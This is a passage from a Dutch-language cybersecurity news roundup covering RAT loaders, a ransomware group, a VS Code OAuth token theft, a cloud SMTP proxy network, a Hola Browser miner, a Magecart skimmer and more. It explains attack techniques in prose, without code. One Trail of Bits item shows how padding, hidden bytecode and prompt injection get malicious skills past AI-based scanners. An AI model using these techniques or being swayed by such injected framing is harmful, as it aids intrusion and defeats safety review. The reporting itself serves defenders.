Dit wordt bereikt door middel van een JavaScript-lader, wiens voornaamste taak is het ophalen en uitvoeren van een .NET RAT zonder op te vallen. Het script extraheert en voert een PowerShell-script uit, dat vervolgens een .NET-lader ophaalt van een externe server. Deze lader fungeert als een stager die controleert of het niet wordt geanalyseerd, de beveiligingscontroles van de machine neutraliseert, persistentie instelt en vervolgens de RAT-payload downloadt en uitvoert. Dit gebeurt via een techniek genaamd process hollowing, waarbij de malware wordt geïnjecteerd in processen die door Microsoft zijn ondertekend.

Eenmaal actief communiceert de trojan met een command-and-control (C2) server via raw TCP-sockets, voert systeemverkenning uit en configureert uitsluitingen voor Microsoft Defender. De trojan patcht ook Antimalware Scan Interface (AMSI) en Event Tracing for Windows (ETW) op native API-niveau, om Windows-telemetrie te verblinden voordat persistentie op de host wordt ingesteld. Dit gebeurt door Run- en RunOnce-registervermeldingen aan te maken en een lader, verantwoordelijk voor het starten van de RAT, in de opstartmap van de gebruiker te plaatsen. De malware kan data extraheren, commando's uitvoeren en aanvullende payloads implementeren, waardoor aanvallers volledige controle krijgen over de geïnfecteerde machines. Tegelijkertijd neemt de malware stappen om onder de radar te blijven door de machine te beëindigen en opnieuw op te starten als het een analysetool detecteert of vaststelt dat het in een sandbox-omgeving draait.

Huntress benadrukt het belang van verdediging in de diepte. Het configureren van een Group Policy Object (GPO) in Active Directory om scriptbestanden zoals .vbs, .hta en .js standaard in Kladblok te openen, kan een dreigingsactor in de allereerste fase stoppen, waardoor verdere payloads nooit worden gedropt. Op het gebied van e-mailbeveiliging moeten organisaties overwegen DMARC-, DKIM- en SPF-records te implementeren om de kans te verkleinen dat gespoofde of kwaadaardige e-mails eindgebruikers bereiken. Bovendien voegt een e-mailgatewayoplossing die bijlagen en links kan sandboxing voordat ze worden afgeleverd, een zinvolle extra beschermingslaag toe.

Bron: Huntress | Bron 2: learn.microsoft.com

De Russischtalige ransomwaregroep die bekendstaat als ‘The Gentlemen’ is in 2026 snel uitgegroeid tot een van de meest actieve dreigingen, alleen overtroffen door Qilin. Hun arsenaal omvat het misbruiken van kwetsbaarheden in Fortinet-producten, operaties met AI-ondersteuning en een volledig op maat gemaakt command-and-control (C2) framework dat door de meeste beveiligingstools niet wordt gedetecteerd.

De groep opereert zonder centraal kantoor of traditionele salarisstructuur. Negen operatorhandles zijn geïdentificeerd die via een zelf gehoste Rocket.Chat-instantie op een onion-site met elkaar communiceren, met plannen om te migreren naar een platform gebaseerd op Rust. Dit slanke, gedistribueerde model markeert een duidelijke verschuiving van de rigide bedrijfsstructuur die groepen zoals Contionce hanteerden.

In mei 2026 wist het Ransom-ISAC onderzoeksteam 3.366 berichten te extraheren van de Rocket.Chat server van The Gentlemen. Deze berichten onthulden interne plannen, discussies over tools en details over slachtofferdoelwitten. Analisten van Vectra AI merkten in een rapport, gedeeld met Cyber Security News (CSN), op dat hoewel de tools van de groep aanzienlijk zijn veranderd, de belangrijkste zwakke punten die ze in slachtoffernetwerken misbruiken sinds 2022 vrijwel hetzelfde zijn gebleven.

De gelekte berichten brachten ook een connectie aan het licht tussen The Gentlemen en eerdere ransomwaremerken. Een onderhandelaar, bekend onder de handle “Tinker”, verscheen zowel in Black Basta-chats als in de logboeken van The Gentlemen, waarbij dezelfde operationele rol binnen beide groepen werd vervuld. Een gedeelde Matrix-homeserver, bestflowers247.online, was aanwezig in archieven van beide groepen, wat de infrastructuurverbinding met hard bewijs verankert. Dit patroon wijst erop dat ransomware-operators niet met pensioen gaan, maar rebranden. Dezelfde personen dragen hun kennis en toegang over van de ene criminele onderneming naar de volgende, waardoor de ontmanteling van groepen veel minder effectief is dan veel verdedigers zouden hopen.

Fortinet blijft de voorkeursingang voor The Gentlemen. De Rocket.Chat-logboeken vermelden FortiGate 81 keer, waarbij CVE-2024-55591, een authenticatie-bypass kwetsbaarheid in FortiOS, expliciet wordt genoemd als hun primaire toegangspunt tot slachtoffernetwerken. Een afzonderlijke analyse van Halcyon toonde aan dat de groep ongeveer 1.000 Fortinet VPN’s brute-forcet, in sommige gevallen met hergebruikte wachtwoorden zoals 'gentlemen25' en 'gentle26' bij meerdere slachtoffers.

Eenmaal binnen implementeert de groep een op maat gemaakt C2-framework genaamd G-BOT. Dit voorheen ongedocumenteerde controlepaneel ondersteunt per-beacon SOCKS5-tunneling en uploadt builders naar tijdelijke bestandssites, ter vervanging van commerciële tools zoals Cobalt Strike. Die overstap maakt detectie moeilijker voor beveiligingsteams die afhankelijk zijn van bekende signatures.

De groep richt zich ook rechtstreeks op hypervisors. Hun Linux-locker valt Hyper-V Volume Manager aan en versleutelt op hypervisor-niveau, zodat endpoint-agents binnen virtuele machines de aanval niet kunnen zien. De locker laat de extensie .i8p14s achter en een losgeldbrief met de naam README-GENTLEMEN.txt, wat aangeeft dat geen enkele infrastructuurlaag buiten bereik is.

The Gentlemen hebben AI van een nieuwigheid omgezet in een werkend onderdeel van hun operatie. Operators verwijzen naar het gebruik van GPT- en Claude-modellen om te helpen bij onderhandelingen over losgeld, waarbij één operator ze beschrijft als automatische antwoordschrijvers voor communicatie met slachtoffers. De groep bespreekt ook het huren van GPU's op vast.ai en het draaien van ongecensureerde AI modellen van Hugging Face om grote hoeveelheden gestolen data te triageren.

Voor credential theft vertrouwt de groep op Phemedrone StealerV2.3.2, LummaC2, XenAllPasswordPro, Chrome App-Bound Encryption Decryption en DumpBrowserSecrets. Deze tools halen opgeslagen wachtwoorden rechtstreeks uit browsers zonder mislukte logins te activeren, wat betekent dat standaard authenticatielogboeken niets ongewoons laten zien. Gestolen data wordt vervolgens via rclone naar MEGA verplaatst, volgens hetzelfde exfiltratiepatroon dat ransomwaregroepen al jaren gebruiken.

Verdedigers kunnen concrete stappen ondernemen op basis van de gelekte chats. Beveiligingsteams moeten edge-apparaten, waaronder Palo Alto, Fortinet, Citrix, F5 en Cisco-apparatuur, controleren op de CVE-lijst die in de operator-chats is besproken. Het behandelen van NTDS.dit en VSS-back-up toegang als een urgentie één-waarschuwing, in plaats van een forensische ontdekking weken later, kan compromittering van het hele domein stoppen voordat deze zich volledig ontwikkelt. Het opsporen van tools zoals rclone, MEGAcmd, WinSCP en Velociraptor op hosts die deze niet horen te draaien, voegt een vroege waarschuwingslaag toe die logboeken alleen niet kunnen bieden.

Bron: Vectra AI

Cybersecurityonderzoekers hebben een one-click aanvalsmethode onthuld die via Microsoft Visual Studio Code (VS Code) het stelen van GitHub OAuth tokens mogelijk maakt. De aanval, die is gedetailleerd door beveiligingsonderzoeker Ammar Askar, kan leiden tot de diefstal van tokens met volledige lees- en schrijfrechten voor alle repositories van een gebruiker, inclusief private.

De kwetsbaarheid bevindt zich in GitHub.dev, een lichtgewicht webgebaseerde broncode-editor die als een VS Code-omgeving in de sandbox van de webbrowser draait. GitHub.dev maakt het voor gebruikers mogelijk om pull-requests te versturen en commits te maken. Deze functionaliteit wordt bereikt doordat github.com een OAuth token via een POST-verzoek naar github.dev stuurt, waarmee het namens de gebruiker kan communiceren met GitHub. Askar benadrukt dat dit token niet beperkt is tot de specifieke repository waarmee is gecommuniceerd, maar volledige toegang biedt tot alle andere repositories waartoe de gebruiker toegang heeft.

De kern van de kwetsbaarheid stelt aanvallers in staat om kwaadaardige VS Code extensies te installeren die GitHub OAuth tokens stelen wanneer deze worden doorgegeven aan GitHub.dev. Dit wordt bereikt door misbruik te maken van een message-passing mechanisme tussen het hoofdvenster van VS Code en webviews. Webviews worden gebruikt voor het renderen van Markdown-previews of het bewerken van Jupyter notebooks.

Specifiek werkt de exploit door kwaadaardig JavaScript uit te voeren binnen een niet-vertrouwde webview. Dit JavaScript simuleert keypresses, ook wel keydown-events genoemd, in het hoofdvenster van de editor. Hierdoor wordt de Command Palette geopend via de toetscombinatie "Ctrl+Shift+P". Vervolgens wordt een door de aanvaller gecontroleerde extensie geïnstalleerd. Deze extensie extraheert het GitHub OAuth token dat naar GitHub.dev is verzonden en gebruikt de GitHub API om alle private repositories op te vragen waartoe het slachtoffer toegang heeft.

De aanpak maakt ook gebruik van een VS Code-functionaliteit genaamd 'local workspace extensions'. Deze functie maakt het mogelijk om een extensie direct te installeren zonder een extra vertrouwensdialoogvenster te presenteren, zolang deze in de map ".vscode/extensions" binnen die workspace is geplaatst. Dit omzeilt effectief de publisher trust check. De onderzoeker legde uit dat extensies als onderdeel van hun package.json extra keybindings aan VS Code kunnen toevoegen. Aangezien keybindings betrouwbaar kunnen worden geactiveerd, kan een keybind worden toegevoegd voor elk gewenst VS Code-commando, zoals het installeren van een extensie terwijl de trusted publisher check wordt overgeslagen.

De kwetsbaarheid werd op 2 juni 2026 aan GitHub gemeld. Een uur later werden details van het probleem publiekelijk bekendgemaakt, mede vanwege Microsofts eerdere omgang met VS Code-gerelateerde bugs. Microsoft heeft de kwetsbaarheid erkend en heeft inmiddels een oplossing geïmplementeerd. Alexandru Dima, een partner software engineering manager bij Microsoft, heeft verduidelijkt dat dit probleem geen invloed had op VS Code Desktop. Een woordvoerder van Microsoft heeft na publicatie bevestigd dat de kwetsbaarheid voor hun diensten is verholpen en dat geen actie van klanten vereist is.

Bron: Ammar Askar | Bron 2: github.com

Een vermoedelijke cybercrimegroep met banden met China, genaamd TA4922, die eerder bekendstond om aanvallen op organisaties in Oost-Azië, richt zich nu ook op organisaties in het Verenigd Koninkrijk, Duitsland, Italië en Zuid-Afrika. Onderzoekers van Proofpoint melden dat de groep de aanvallen de afgelopen maanden heeft opgevoerd, waarbij bekende phishingtactieken worden gecombineerd met een groeiend arsenaal aan malware. De activiteiten omvatten diefstal van inloggegevens, fraudepogingen, malware voor externe toegang en het misbruik van legitieme software voor extern beheer om toegang tot slachtoffernetwerken te behouden.

Voor Britse organisaties omvatten de meest relevante activiteiten e-mails die zijn ontworpen om te lijken op routinecommunicatie van de overheid of bedrijven. Eén campagne deed zich voor als belastingdienst en verwees naar btw-aangiftes, loonbelastingdocumenten en compliance. Een andere campagne gebruikte berichten met een thema rond uitkeringen en compliance, die de taal van overheids- en universele uitkeringsdiensten kopieerden. Volgens de onderzoekers waren deze lokmiddelen niet generieke spam, maar opgesteld rond lokale bedrijfsprocessen waar werknemers al mee te maken hebben, zoals belastingpapieren, HR-mededelingen, salarisbestanden, facturen en complianceverzoeken. Deze aanpak vergroot de kans dat een ontvanger een bestand opent, op een link klikt of de conversatie naar een ander kanaal verplaatst.

Proofpoint meldt dat TA4922 historisch gezien Japan en andere delen van Azië, waaronder Taiwan, Korea, Singapore en India, heeft geviseerd. De recentere activiteit suggereert dat de groep een grotere groep slachtoffers test, waarbij Europese en Afrikaanse organisaties nu in de campagnes verschijnen.

De malware-toolkit van de groep is ook uitgebreid. Proofpoint rapporteerde het gebruik van varianten van ValleyRAT, ook bekend als Winos4.0, Atlas RAT, RomulusLoader en SilentRunLoader. Elke tool speelt een andere rol, van het verkrijgen van externe toegang tot het laden van verdere payloads of het stelen van browsergegevens. SilentRunLoader, een nieuwere Python-gebaseerde stealer en loader, is waarschijnlijk ontwikkeld met behulp van grote taalmodellen (LLM's). Het is een van de meest opvallende toevoegingen aan de toolkit van TA4922, omdat het gericht is op gegevens die zijn opgeslagen in Google Chrome. Proofpoint stelt dat de malware opgeslagen inloggegevens, cookies en browse-informatie kan verzamelen voordat de gegevens naar door aanvallers beheerde infrastructuur worden verzonden. In de Britse campagne met belastingthema werd de malware gehost via MediaFire en geleverd via links in e-mails.

TA4922 heeft ook gebruikgemaakt van DLL sideloading, een techniek waarbij een kwaadaardig bestand wordt geladen door een legitiem uitvoerbaar bestand. Voor een slachtoffer kan het bestand deel lijken uit te maken van een normaal documentpakket of een bedrijfsapplicatie. In de praktijk kan het malware starten, terwijl de activiteit moeilijker op te sporen is tijdens routinematige scans. Een ander onderdeel van de modus operandi van de groep is het gebruik van legitieme tools voor extern beheer zoals AnyDesk en SyncFuture. Deze producten hebben geldige zakelijke toepassingen, maar aanvallers kunnen ze misbruiken nadat ze toegang hebben verkregen, waardoor ze systemen kunnen beheren terwijl hun activiteit minder duidelijk kwaadaardig lijkt.

Proofpoint schatte ook met grote zekerheid in dat een deel van de nieuwere malware voor Python van TA4922 waarschijnlijk is ontwikkeld met behulp van grote taalmodellen. Onderzoekers wezen op codecommentaar, strings en ongewijzigde placeholderwaarden als tekenen dat de actor mogelijk AI tools gebruikt om sneller malware te produceren. Proofpoint's rapport stelt dat de actor financieel gemotiveerd lijkt, met activiteiten gericht op externe toegang, gegevensdiefstal, fraude, doorverkopen van toegang of persistente toegang. Hoewel sommige tools van TA4922 overeenkomsten vertonen met die gebruikt in spionagezaken, behandelt Proofpoint de groep als een aparte cybercrime-operatie. De uitbreiding van de groep naar het Verenigd Koninkrijk en andere regio's toont aan dat campagnes die ooit geconcentreerd waren in Oost-Azië, nu een directe zorg worden voor meer internationale organisaties. Organisaties moeten zich bewust zijn van cyberaanvallen met een administratief thema, waarbij belastingaangiftes, loonlijsten, uitkeringsberichten en complianceverzoeken op het eerste gezicht gewoon kunnen lijken, maar een nuttige dekmantel vormen voor aanvallers.

Bron: Proofpoint | Bron 2: hexastrike.com

Google heeft een nieuwe beveiligingsfunctie voor Android geïntroduceerd, genaamd "fake call detection", die is ontworpen om telefoongesprekken te detecteren en te markeren waarbij cybercriminelen gebruikmaken van kunstmatige intelligentie om persoonlijke contacten van gebruikers te imiteren. De functie wordt deze maand wereldwijd uitgerold naar apparaten met Android 12 en hoger, beginnend met Pixel-toestellen, en zal standaard zijn ingeschakeld.

De 'fake call detection' werkt automatisch wanneer zowel de beller als de ontvanger de telefoonapplicatie van Google gebruiken. Zodra een contact een oproep plaatst, stuurt diens apparaat in realtime een stil, versleuteld bevestigingssignaal naar het apparaat van de ontvanger. Als dit signaal ontbreekt, wat kan duiden op spoofing, zal het apparaat van de ontvanger ter verificatie contact opnemen met de daadwerkelijke telefoon van het contact. Indien het apparaat van het contact bevestigt geen oproep te plaatsen, ontvangt de ontvanger direct een waarschuwing op het scherm met het advies om op te hangen. Deze proactieve melding is bedoeld om te voorkomen dat gebruikers slachtoffer worden van deepfake-imitatie en call spoofing.

De nieuwe beveiligingsfunctie is gebaseerd op de open standaard voor Rich Communication Services (RCS) en functioneert uitsluitend op Android-apparaten waarop de apps Telefoon van Google, Contacten en Berichten van Google (met ingeschakelde RCS) zijn geïnstalleerd. Google stelt dat deze functie twee veelvoorkomende fraudetactieken aanpakt: het spoofen van het telefoonnummer van een bekend contact en het gelijktijdig gebruiken van AI-stemkloneringstechnologie om de stem van die persoon na te bootsen.

De U.S. Federal Trade Commission (FTC) waarschuwde vorig jaar dat de gerapporteerde verliezen door impersonatie-scams in 2024 alleen al $2,95 miljard bedroegen. Het Global Financial Fraud Threat Assessment van INTERPOL uit maart 2026 identificeerde fraude via impersonatie als een van de belangrijkste dreigingen die vorig jaar wereldwijd bijdroegen aan meer dan $440 miljard aan verliezen. Google benadrukt dat, hoewel mensen jarenlang vertrouwden op nummerweergave om te weten wie er aan de lijn was, dit door de nieuwe tactieken van oplichters niet langer afdoende is. Gebruikers die een andere telefoonapplicatie gebruiken, kunnen de Telefoon van Google app vanuit de Play Store installeren en deze als standaard instellen om zich beter te beschermen tegen valse oproepen.

In december heeft Google ook de ondersteuning voor Android-bescherming tegen scam-oproepen tijdens gesprekken uitgebreid naar diverse banken en financiële apps in de Verenigde Staten, waaronder Cash App en de mobiele bankapp van JPMorganChase.

Bron: wiz.io | Bron 2: ftc.gov | Bron 3: interpol.int

De dreigingsactor bekend als PCPJack heeft cloudservers, geassocieerd met Amazon Web Services (AWS), Google Cloud en Microsoft Azure, gekaapt om een verborgen SMTP-e-mailrelaynetwerk op te zetten. Dit netwerk omvat gecompromitteerde zakelijke servers in de Verenigde Staten, Europa en Azië, die stilletjes zijn omgezet in SMTP-proxies. Deze proxies zijn geverifieerd op hun e-mailrelay functionaliteit en elke vijf minuten gesynchroniseerd met een downstream ontvanger. De infrastructuur was nog actief toen deze werd ontdekt, zo meldt dreigingsinformatiebedrijf Hunt.io.

Hunt.io deed de ontdekking nadat de dreigingsactor achter de operatie twee open directory's op een command en control (C2) server (213.136.80[.]73) zonder enige authenticatie had achtergelaten. In deze directory's werden onder andere broncode, gecompileerde binaire bestanden, logs van de implementatiestatus, internetscanners, exploitatie tools en een live Sliver configuratie aangetroffen.

PCPJack kwam voor het eerst aan het licht in april 2026, toen SentinelOne een framework voor het stelen van inloggegevens identificeerde dat specifiek gericht was op clouddiensten. Opvallend was dat PCPJack maatregelen nam om processen of artefacten van TeamPCP te beëindigen en te verwijderen, een andere bekende hackergroep die recent aandacht trok met aanvallen op softwaretoeleveringsketens.

Een van de open directory's bevatte een met Sliver geïntegreerde SMTP-proxy-implementatie toolkit, samen met Chisel tunneling en proxy binaire bestanden voor de meeste Linux CPU-architecturen, zoals AMD64, ARM64 en x86. Aan de slachtofferkant wordt het binaire bestand gedropt als een verborgen bestand met een punt als voorvoegsel en blijft het bestaan op "/var/tmp/.xs."

Verder werden in de directory's deployer scripts gevonden. Deze scripts zijn ontworpen om de Sliver C2 client configuratie te laden en te filteren op Linux beacons die binnen de laatste tien minuten hebben ingecheckt. Beacons zijn implantaten die periodiek contact opnemen met de C2 server om te controleren op commando's. Elke beacon ontvangt een SOCKS5-proxy poort die deterministisch is afgeleid van een MD5-hash van zijn Sliver UUID, en wordt toegewezen aan het bereik 10000-14999. Dit elimineert de noodzaak voor een gedeeld poort register.

Het script is ook in staat om een SMTP-kwaliteitspoort uit te voeren die controleert op uitgaande toegang tot smtp.gmail[.]com:587. Hosts die deze controle niet doorstaan, worden overgeslagen. Dit definieert het doel van de operatie: hosts die geen e-mail kunnen doorsturen, hebben geen waarde voor deze pijplijn. Beacons worden verwerkt in batches van 50, met een wachttijd van 25 minuten na uploads en 15 minuten na uitvoeringscommando's, om langzame beacon check-ins op te vangen.

Latere versies van de deployer scripts bleken de SMTP-poort en de batch-logica te verwijderen. Ook aanwezig is een diagnostisch script dat vijf actieve beacons selecteert en hen elk een shell commando geeft dat controleert op de aanwezigheid van Chisel binaire bestanden op bekende droppaden, een lopend Chisel proces, de bereikbaarheid van poort 9000 op de C2, en de aanwezigheid van persistentie artefacten, zoals de cron-ingang of de systemd-service.

Bovendien draait de C2 server een Python script genaamd "chisel_verifier.py" als een persistent achtergrondprogramma. Dit script inventariseert elke 60 seconden actieve Chisel tunnelpoorten via `ss -tlnp`, test elke nieuwe poort op SMTP-functionaliteit en verwijdert mislukte of verloren tunnels uit de actieve pool. Geverifieerde proxies worden verrijkt met exit IP-adres, land en ASN via diensten zoals api.ipify[.]org en ip-api[.]com. De proxylijsten worden vervolgens elke vijf minuten gesynchroniseerd via het Secure Copy Protocol (SCP) naar een aparte downstream server op 38.242.204[.]245. Deze server is momenteel niet toegankelijk. Het uiteindelijke doel van de operatie is in dit stadium nog onduidelijk.

Hunt.io beschrijft de campagne als opportunistisch en stelt dat de 230-node uitkomst het waarneembare resultaat is. Of deze progressie een enkele operator weerspiegelt die herhaalt, of meerdere actoren die dezelfde infrastructuur delen, kan niet worden vastgesteld uit de teruggevonden bestanden. De geverifieerde proxylijst wordt elke vijf minuten gesynchroniseerd met die server, en iemand verbruikt deze. Of het nu voor spam, phishing of iets anders is, de infrastructuur om op schaal te leveren was duidelijk operationeel.

Bron: Hunt.io

Dashlane heeft bekendgemaakt dat dreigingsactoren erin geslaagd zijn om de authenticatie met twee factoren (2FA) te omzeilen via een brute-force aanval. Hierdoor konden ongeautoriseerde apparaten worden geregistreerd en versleutelde wachtwoordkluizen worden gedownload van minder dan twintig gebruikers van persoonlijke abonnementen. Een afgerond onderzoek bevestigt dat er geen bredere impact is geweest op de interne systemen van Dashlane.

De aanval begon op zondag 31 mei 2026, toen een externe dreigingsactor een brute-force campagne met hoog volume lanceerde gericht op gebruikersaccounts van Dashlane. De aanvaller concentreerde zich specifiek op de API-eindpunten voor apparaatregistratie van het platform. Hierbij werden geautomatiseerde verzoeken verstuurd om zescijferige eenmalige tokens te raden, die via e-mail of authenticator apps worden verzonden.

De geautomatiseerde beveiligingscontroles van Dashlane reageerden zoals bedoeld, wat leidde tot accountvergrendelingen bij de getroffen accounts voordat de aanval volledig werd ingedamd. De dreigingsactor maakte misbruik van het apparaatregistratieproces van Dashlane, dat wordt geactiveerd wanneer een gebruiker een nieuw apparaat, zoals een mobiele telefoon of computer, aan zijn account toevoegt.

Na succesvolle 2FA-verificatie registreert Dashlane het apparaat en downloadt automatisch een kopie van de versleutelde kluis naar dat apparaat. Door geldige zescijferige tokens voor een subset van accounts te brute-forcen, konden aanvallers het registratieproces voltooien. Dit resulteerde in de effectieve autorisatie van het apparaat en het downloaden van versleutelde kluiskopieën zonder medeweten van de accounthouder.

Minder dan twintig gebruikers van persoonlijke abonnementen kregen hun versleutelde kluizen geëxfiltreerd. Alle getroffen gebruikers zijn direct door Dashlane op de hoogte gebracht. Ondanks het downloaden van de kluizen, stelt Dashlane dat de gestolen gegevens effectief ontoegankelijk blijven. De inhoud van de kluizen wordt beschermd door het hoofdwachtwoord van de gebruiker, dat nooit in platte tekst naar Dashlane servers wordt verzonden en nooit wordt opgeslagen. Dit is een kernprincipe van Dashlane's zero-knowledge architectuur.

De versleutelingsstack, bestaande uit Argon2 + AES-256-CBC + HMAC-SHA256, maakt het brute-forcen van het hoofdwachtwoord statistisch onhaalbaar, zelfs over langere periodes. Er is geen bewijs dat de interne infrastructuur van Dashlane op enig moment tijdens het incident is gecompromitteerd. Op 4 juni 2026 kondigde Dashlane de voltooiing van het onderzoek aan, waarbij werd bevestigd dat er geen aanvullende impact op klanten was. De herstelmaatregelen omvatten: het blokkeren van kwaadaardig verkeer op netwerkniveau, het reactiveren van opgeschorte en vergrendelde gebruikersaccounts, het implementeren van extra verificatielagen in het apparaatregistratieproces en het verharden van de beveiliging van API-eindpunten om toekomstig kwaadaardig verkeer te detecteren en te filteren. Het incident onderstreept dat zelfs robuuste wachtwoordmanagers kunnen worden aangevallen aan de authenticatieperimeter in plaats van de versleutelingslaag zelf, waardoor sterke 2FA-configuratie en hygiëne van het hoofdwachtwoord cruciale verdedigingsmechanismen zijn voor alle gebruikers.

Bron: Dashlane

Onderzoek heeft uitgewezen dat AI-skillscanners van platforms zoals ClawHub, Cisco en Vercel kunnen worden omzeild. Dit maakt het mogelijk voor kwaadaardige skills om te worden geüpload en verspreid via openbare marktplaatsen, wat een groeiend risico vormt voor de toeleveringsketen in ecosystemen van agents. Skills fungeren hierbij als herbruikbare componenten die code kunnen uitvoeren en het gedrag van modellen kunnen beïnvloeden.

Onderzoekers van Trail of Bits toonden aan dat aanvallers detectiemechanismen kunnen ontwijken met eenvoudige obfuscatietrucs en verpakkingstechnieken, in plaats van geavanceerde exploitatiemethoden. In een aanval gericht op ClawHub voegden de onderzoekers meer dan 100.000 nieuwe regeltekens in, waardoor kwaadaardige code buiten het inspectievenster van de scanner werd geduwd. Dit veroorzaakte truncatie in de analysepijplijn, waardoor schadelijke logica onopgemerkt bleef en geïntegreerde scan-engines, zoals Code Insight van VirusTotal, in verwarring werden gebracht.

Verder onderzoek naar de open-source skillscanner van Cisco en de skills.SH-integraties van Vercel onthulde aanvullende zwakke punten. Deze platforms zijn afhankelijk van een combinatie van statische analyse, patroonherkenning en inspectie gebaseerd op grote taalmodellen (LLM's). De onderzoekers van Trail of Bits ontdekten echter dat deze verdedigingsmechanismen kunnen worden gepasseerd wanneer kwaadaardige inhoud wordt verborgen in minder voor de hand liggende formaten, zoals gecompileerde Python-bytecode (.pyc) of bestanden gebaseerd op archieven, zoals .docx.

Een gedemonstreerde aanval betrof een ogenschijnlijk onschuldige skill voor tekstopmaak die gecompileerde Python-bytecode bevatte. Hoewel de zichtbare broncode onschadelijk leek, extraheerde de bytecode stiekem omgevingsvariabelen, wat potentiële data-exfiltratie mogelijk maakte. Omdat scanners zich voornamelijk richtten op leesbare bronbestanden, bleef de kwaadaardige payload onopgemerkt en werd deze als veilig geclassificeerd.

Een andere effectieve techniek maakte gebruik van indirecte uitvoeringspaden. Een skill instrueerde de AI-agent om operationele logica op te halen uit een document dat een verborgen script bevatte. Deze methode omzeilde zowel detectie gebaseerd op signatures als LLM-redenering, aangezien het kwaadaardige gedrag niet direct werd blootgesteld in de primaire skill-definitie.

Onderzoekers van Trail of Bits slaagden er ook in om promptinjectie te gebruiken om scanners gebaseerd op LLM's te manipuleren. In één voorbeeld vermomde een skill een configuratie van een kwaadaardig pakketregister als een standaard bedrijfsconfiguratie. Door het gedrag te presenteren als een legitieme bedrijfsvereiste, degradeerde de scanner het risico naar een lage ernst. De skill werd goedgekeurd, ondanks het potentieel om installaties van afhankelijkheden om te leiden naar infrastructuur onder controle van aanvallers.

Deze omzeilingen benadrukken fundamentele beperkingen in de huidige scanbenaderingen. Statische analyse heeft moeite met complexe of verborgen bestandsformaten, terwijl systemen gebaseerd op LLM's kunnen worden misleid door overtuigende of contextueel ingekaderde instructies. Bovendien creëren beperkingen zoals beperkte contextvensters en selectieve bestandsinspectie blinde vlekken die aanvallers herhaaldelijk kunnen exploiteren.

Het probleem wordt verergerd door de snelle groei van openbare marktplaatsen voor skills, waar gebruikers skills van derden kunnen installeren met minimale verificatie. In tegenstelling tot gecontroleerde omgevingen, geven deze platforms vaak prioriteit aan bruikbaarheid en snelheid boven strenge beveiligingscontroles, wat de blootstelling aan kwaadaardige uploads vergroot.

De onderzoekers van Trail of Bits concluderen dat geautomatiseerd scannen alleen onvoldoende is om ecosystemen van AI-skills te beveiligen. Ze bevelen aan om traditionele praktijken voor toeleveringsketenbeveiliging toe te passen, waaronder gecurateerde repositories, strikte toegangscontroles en versiepinnen. Totdat sterkere beveiligingsmaatregelen zijn ontwikkeld, wordt organisaties geadviseerd om alle openbare AI-skills als onvertrouwde code te behandelen en deze niet in gevoelige omgevingen te implementeren.

Bron: Trail of Bits

De versie van de Hola Browser voor Windows is gecompromitteerd in een aanval op de supply chain, waarbij een niet-aangegeven uitvoerbaar bestand is geleverd dat door onderzoekers is geïdentificeerd als een miner voor cryptocurrency. Deze compromittering werd ontdekt tijdens periodieke certificeringscontroles van de Hola Browser, als onderdeel van de AppEsteem certificeringstestprocedure die eerder met succes was doorlopen.

Hola is een Israëlisch bedrijf dat voornamelijk bekend staat om zijn Hola VPN, een dienst die gebruikers in staat stelt internetverkeer via de apparaten van andere gebruikers of via betaalde proxy-infrastructuur te routeren om geografische beperkingen te omzeilen en toegang te krijgen tot content uit verschillende landen. De Hola Browser is gebaseerd op Chromium en integreert functionaliteit voor VPN en proxy rechtstreeks in de browser. Het bedrijf en zijn producten hebben in het verleden kritiek gekregen vanwege ondoorzichtige praktijken voor verkeersafhandeling, die verband hielden met de exploitatie van een commerciële dienst genaamd Luminati Networks, waarbij gratis gebruikers werden omgezet in proxy's.

Tijdens de meest recente controles op de integriteit van de applicatie hebben Sophos en andere bedrijven gespecialiseerd in cybersecurity, die betrokken waren bij het evaluatieproces, een niet-aangegeven uitvoerbaar bestand met de naam ‘me.exe’ ontdekt. Dit bestand werd in sommige gevallen geïnstalleerd onder C:\Program Files\Hola\. Het bestand was niet gecertificeerd, had geen tijdstempel, was niet digitaal ondertekend, bevatte geobfusceerde code en kon naar het geheugen schrijven. Bij nader onderzoek vond Sophos aanwijzingen dat het binaire bestand een Monero cryptocurrency-miner was, inclusief tekenreeksen die wezen op de ware aard ervan.

De miner voegt een uitzonderingsregel toe voor Windows Defender, kopieert zichzelf naar Program Files als ‘HolaMonitorService.exe’, creëert een automatisch startende service voor Windows genaamd ‘hola_monitor_svc’ en wordt uitgevoerd wanneer de computer inactief is.

Hola werd door AppEsteem op de hoogte gebracht van de bevindingen en bevestigde dat het bedrijf een compromittering van de supply chain had ondergaan. Deze compromittering werd ook onafhankelijk gedetecteerd door het cybersecuritybedrijf Sygnia. Desondanks stelt de softwareleverancier dat slechts ongeveer 0,1% van zijn gebruikers is getroffen en dat er geen bewijs is van toegang tot gebruikersdata, diefstal of compromittering daarvan. Avi Raz Cohen, CEO van Hola, verzekerde: "We hebben sindsdien onze distributiepijplijn volledig herbouwd, geavanceerde verificatie van code-signing geïmplementeerd en strengere toegangscontroles en continue monitoring in onze infrastructuur geïntroduceerd. Deze maatregelen zijn ontworpen om te garanderen dat alleen aangegeven, gecertificeerde en ondertekende componenten aan onze gebruikers worden geleverd." BleepingComputer heeft contact opgenomen met Hola voor meer informatie over hoe de inbreuk heeft plaatsgevonden, wie de daders zijn en of cliënten op andere platforms ook zijn getroffen, maar heeft tot op heden geen reactie ontvangen.

Bron: Sophos | Bron 2: hubs.li

Een nieuwe campagne van Magecart maakt misbruik van de API-infrastructuur van Stripe om zowel de payload voor diefstal van creditcardgegevens als de geëxfiltreerde data van afrekenpagina's te hosten. Deze kwaadaardige activiteit is volledig afhankelijk van Google Tag Manager (GTM) en Stripe-domeinen, te weten googletagmanager.com en api.stripe.com, die door online winkels impliciet worden vertrouwd.

De nieuwe malwarefamilie is ontdekt door onderzoekers van e-commerce beveiligingsbedrijf Sansec. Zij stelden vast dat de kwaadaardige code wordt geladen vanuit een Google Tag Manager-container en wordt uitgevoerd op elke pagina die deze laadt. Volgens Sansec bewegen zowel de payload als de gestolen creditcards via api.stripe.com. Aangezien winkels dit domein standaard toestaan, glipt de skimmer langs Content Security Policy (CSP)-regels en netwerkfilters die verkeer naar een onbekend skimmerdomein anders zouden detecteren.

Google Tag Manager is een beheersysteem waarmee website-eigenaren scripts voor analyses, advertenties en tracking kunnen toevoegen en beheren zonder de broncode van de site te wijzigen. Stripe is een veelgebruikt platform voor betalingsverwerking dat door online winkels wordt ingezet voor het accepteren van creditcards, het beheren van klantbestellingen en het afhandelen van facturatie.

